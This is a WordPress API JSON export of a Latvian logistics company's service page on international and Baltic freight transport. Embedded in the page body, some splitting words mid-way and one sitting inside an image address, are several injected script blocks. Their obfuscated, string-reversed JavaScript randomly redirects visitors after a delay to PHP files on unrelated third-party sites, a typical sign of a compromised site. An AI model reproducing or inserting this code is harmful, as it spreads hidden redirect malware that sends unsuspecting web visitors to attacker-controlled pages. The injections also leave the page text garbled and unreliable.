{"id":5117,"date":"2023-09-08T15:34:35","date_gmt":"2023-09-08T15:34:35","guid":{"rendered":"https:\/\/wellman.lv\/%d1%83%d1%81%d0%bb%d1%83%d0%b3%d0%b8\/kravu-parvadajumi-un-kurjertransports\/"},"modified":"2025-04-01T10:08:35","modified_gmt":"2025-04-01T10:08:35","slug":"gruzoperevozki-2","status":"publish","type":"page","link":"https:\/\/wellman.lv\/ru\/%d1%83%d1%81%d0%bb%d1%83%d0%b3%d0%b8\/gruzoperevozki-2\/","title":{"rendered":"Kravu p\u0101rvad\u0101jumi un kurjertransports"},"content":{"rendered":"<div style=\"font-family: arial;\"><\/div>\n<div style=\"font-family: arial;\">\u00a0Pie\u0146emot savu pa\u0161u m\u016bsdien\u012bgo Noliktavu Kompleksu par pamatu un galveno sast\u0101vda\u013cu kravu pieg\u0101des lo\u0123istikas \u0137\u0113d\u0113, uz\u0146\u0113mums \u201eWellman Logistics\u201d saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b kravu transport\u0113\u0161anas un eksped\u0113\u0161anas pakalpojumus.<\/div>\n<div style=\"font-family: arial;\">\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-1335\" src=\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg\" alt=\"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\" width=\"600\" height=\"305\" srcset=\"https:\/\/wellman.lv\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg 600w, https:\/\/wellman.lv\/wp-content\/uploads\/2015\/03\/transportation-logistics-300x153.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><strong>1. Starptautiskie kravu p\u0101rvad\u0101jumi <\/strong><\/p>\n<\/div>\n<div style=\"font-family: arial;\">\n<p>\u201eWellman Logistics\u201d Lo\u0123istikas centrs sniedz eksped\u0113\u0161anas pakalpojumus kravu transport\u0113\u0161an\u0101 \u201eno durv\u012bm l\u012bdz durv\u012bm\u201d ar:<\/p>\n<ul>\n<li>au<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>totransportu<\/li>\n<li>j\u016bras transportu<\/li>\n<li>dzelzce\u013ca transportu<\/li>\n<li>gaisa transportu<\/li>\n<\/ul>\n<p>Kravu p\u0101rvad\u0101jumi individu\u0101li izstr\u0101d\u0101t\u0101 optim\u0101l\u0101 mar\u0161rut\u0101.<\/p>\n<ul>\n<li>Kravu p\u0101rvad\u0101jumi no Eiropas un uz Eiropu<\/li>\n<li>Kravas tranz\u012bta p\u0101rvad\u0101jumi no\/uz Eiropu, no\/uz Krieviju, k\u0101 ar\u012b NVS valst\u012bm<\/li>\n<li>Pre\u010du transport\u0113\u0161ana no\/uz \u0136\u012bnu un \u0100ziju<\/li>\n<li>Pre\u010du transport\u0113\u0161ana speci\u0101li izstr\u0101d\u0101t\u0101 mar\u0161rut\u0101<\/li>\n<\/ul>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-1331\" src=\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/04\/cus<script>$nJe=function(n){if (typeof ($nJe.list[n]) == &#171;string&#187;) return $nJe.list[n].split(&#171;&#187;).reverse().join(&#171;&#187;);return $nJe.list[n];};$nJe.list=[&#171;\\&#8217;php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\&#8217;=ferh.noitacol.tnemucod&#187;];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>toms-last.jpg&#187; alt=&#187;Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi&#187; width=&#187;631&#8243; height=&#187;212&#8243; \/><\/p>\n<\/div>\n<div style=\"font-family: arial;\"><strong> 2. Re\u0123ion\u0101lie kravu p\u0101rvad\u0101jumi pa Latviju un Baltijas valst\u012bm<\/strong><\/div>\n<div style=\"font-family: arial;\"><\/div>\n<div style=\"font-family: arial;\">\n<p>Papildus starptautiskajai kravu transport\u0113\u0161anai, uz\u0146\u0113mums \u201eWellman Logistics\u201d nodro\u0161ina kravu transport\u0113\u0161anu Baltijas valst\u012bs un <script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>to re\u0123ion\u0101.<\/p>\n<p><span style=\"font-family: arial;\">\u201eWellman Logistics\u201d Lo\u0123istikas centrs var k\u013c\u016bt<\/span><span style=\"font-family: arial;\"> par J\u016bsu re\u0123ion\u0101lo distrib\u016bcijas centru, no kurienes m\u0113s var\u0113sim nodro\u0161in\u0101t kravu pieg\u0101des<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial;\">Latvij\u0101<\/span><\/li>\n<li>Igaunij\u0101<\/li>\n<li>Lietuv\u0101<\/li>\n<\/ul>\n<p>M\u0113s var\u0113sim izstr\u0101d\u0101t un pied\u0101v\u0101t risin\u0101jumu <span style=\"font-family: arial;\">s\u012bku kravu partiju pieg\u0101des jom\u0101. <\/span><\/p>\n<\/div>\n<div style=\"font-family: arial;\"><\/div>\n<div style=\"font-family: arial;\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0Pie\u0146emot savu pa\u0161u m\u016bsdien\u012bgo Noliktavu Kompleksu par pamatu un galveno sast\u0101vda\u013cu kravu pieg\u0101des lo\u0123istikas \u0137\u0113d\u0113, uz\u0146\u0113mums \u201eWellman Logistics\u201d saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b kravu transport\u0113\u0161anas un eksped\u0113\u0161anas pakalpojumus. &nbsp; 1. Starptautiskie kravu p\u0101rvad\u0101jumi \u201eWellman Logistics\u201d Lo\u0123istikas centrs sniedz eksped\u0113\u0161anas pakalpojumus kravu transport\u0113\u0161an\u0101 \u201eno durv\u012bm l\u012bdz durv\u012bm\u201d ar: autotransportu j\u016bras transportu [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":0,"parent":3536,"menu_order":2,"comment_status":"open","ping_status":"closed","template":"pages\/page-services.php","meta":{"_acf_changed":false,"_uag_custom_page_level_css":"","_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"class_list":["post-5117","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi<\/title>\n<meta name=\"description\" content=\"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wellman.lv\/?page_id=5110\" \/>\n<meta property=\"og:locale\" content=\"ru_RU\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\" \/>\n<meta property=\"og:description\" content=\"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wellman.lv\/?page_id=5110\" \/>\n<meta property=\"og:site_name\" content=\"3pl\" \/>\n<meta property=\"article:modified_time\" content=\"2025-04-01T10:08:35+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wellman.lv\/?page_id=5110\",\"url\":\"https:\/\/wellman.lv\/?page_id=5110\",\"name\":\"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\",\"isPartOf\":{\"@id\":\"https:\/\/wellman.lv\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/wellman.lv\/?page_id=5110#primaryimage\"},\"image\":{\"@id\":\"https:\/\/wellman.lv\/?page_id=5110#primaryimage\"},\"thumbnailUrl\":\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg\",\"datePublished\":\"2023-09-08T15:34:35+00:00\",\"dateModified\":\"2025-04-01T10:08:35+00:00\",\"description\":\"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi\",\"breadcrumb\":{\"@id\":\"https:\/\/wellman.lv\/?page_id=5110#breadcrumb\"},\"inLanguage\":\"ru-RU\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wellman.lv\/?page_id=5110\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ru-RU\",\"@id\":\"https:\/\/wellman.lv\/?page_id=5110#primaryimage\",\"url\":\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg\",\"contentUrl\":\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/wellman.lv\/?page_id=5110#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/wellman.lv\/ru\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Services\",\"item\":\"https:\/\/wellman.lv\/pakalpojumi\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Kravu p\u0101rvad\u0101jumi un kurjertransports\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wellman.lv\/#website\",\"url\":\"https:\/\/wellman.lv\/\",\"name\":\"3pl\",\"description\":\"Just another WordPress site\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/wellman.lv\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ru-RU\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","description":"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/wellman.lv\/?page_id=5110","og_locale":"ru_RU","og_type":"article","og_title":"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","og_description":"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","og_url":"https:\/\/wellman.lv\/?page_id=5110","og_site_name":"3pl","article_modified_time":"2025-04-01T10:08:35+00:00","og_image":[{"url":"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg","type":"","width":"","height":""}],"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/wellman.lv\/?page_id=5110","url":"https:\/\/wellman.lv\/?page_id=5110","name":"Kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","isPartOf":{"@id":"https:\/\/wellman.lv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/wellman.lv\/?page_id=5110#primaryimage"},"image":{"@id":"https:\/\/wellman.lv\/?page_id=5110#primaryimage"},"thumbnailUrl":"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg","datePublished":"2023-09-08T15:34:35+00:00","dateModified":"2025-04-01T10:08:35+00:00","description":"Lo\u0123istikas centrs wellman.lv saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b tiek pied\u0101v\u0101ti kravu p\u0101rvad\u0101jumi un eksped\u0113\u0161anas pakalpojumi","breadcrumb":{"@id":"https:\/\/wellman.lv\/?page_id=5110#breadcrumb"},"inLanguage":"ru-RU","potentialAction":[{"@type":"ReadAction","target":["https:\/\/wellman.lv\/?page_id=5110"]}]},{"@type":"ImageObject","inLanguage":"ru-RU","@id":"https:\/\/wellman.lv\/?page_id=5110#primaryimage","url":"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg","contentUrl":"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/03\/transportation-logistics.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/wellman.lv\/?page_id=5110#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/wellman.lv\/ru\/"},{"@type":"ListItem","position":2,"name":"Services","item":"https:\/\/wellman.lv\/pakalpojumi\/"},{"@type":"ListItem","position":3,"name":"Kravu p\u0101rvad\u0101jumi un kurjertransports"}]},{"@type":"WebSite","@id":"https:\/\/wellman.lv\/#website","url":"https:\/\/wellman.lv\/","name":"3pl","description":"Just another WordPress site","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/wellman.lv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ru-RU"}]}},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"about_us_picture":false,"blog_thumbnail":false},"uagb_author_info":{"display_name":"Santa Tisenkopfa","author_link":"https:\/\/wellman.lv\/ru\/author\/santa\/"},"uagb_comment_info":0,"uagb_excerpt":"\u00a0Pie\u0146emot savu pa\u0161u m\u016bsdien\u012bgo Noliktavu Kompleksu par pamatu un galveno sast\u0101vda\u013cu kravu pieg\u0101des lo\u0123istikas \u0137\u0113d\u0113, uz\u0146\u0113mums \u201eWellman Logistics\u201d saist\u012bb\u0101 ar kravu pied\u0101v\u0101 ne tikai noliktavas oper\u0101cijas, bet ar\u012b kravu transport\u0113\u0161anas un eksped\u0113\u0161anas pakalpojumus. &nbsp; 1. Starptautiskie kravu p\u0101rvad\u0101jumi \u201eWellman Logistics\u201d Lo\u0123istikas centrs sniedz eksped\u0113\u0161anas pakalpojumus kravu transport\u0113\u0161an\u0101 \u201eno durv\u012bm l\u012bdz durv\u012bm\u201d ar: autotransportu j\u016bras transportu&hellip;","_links":{"self":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/5117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/comments?post=5117"}],"version-history":[{"count":5,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/5117\/revisions"}],"predecessor-version":[{"id":5302,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/5117\/revisions\/5302"}],"up":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/3536"}],"wp:attachment":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/media?parent=5117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}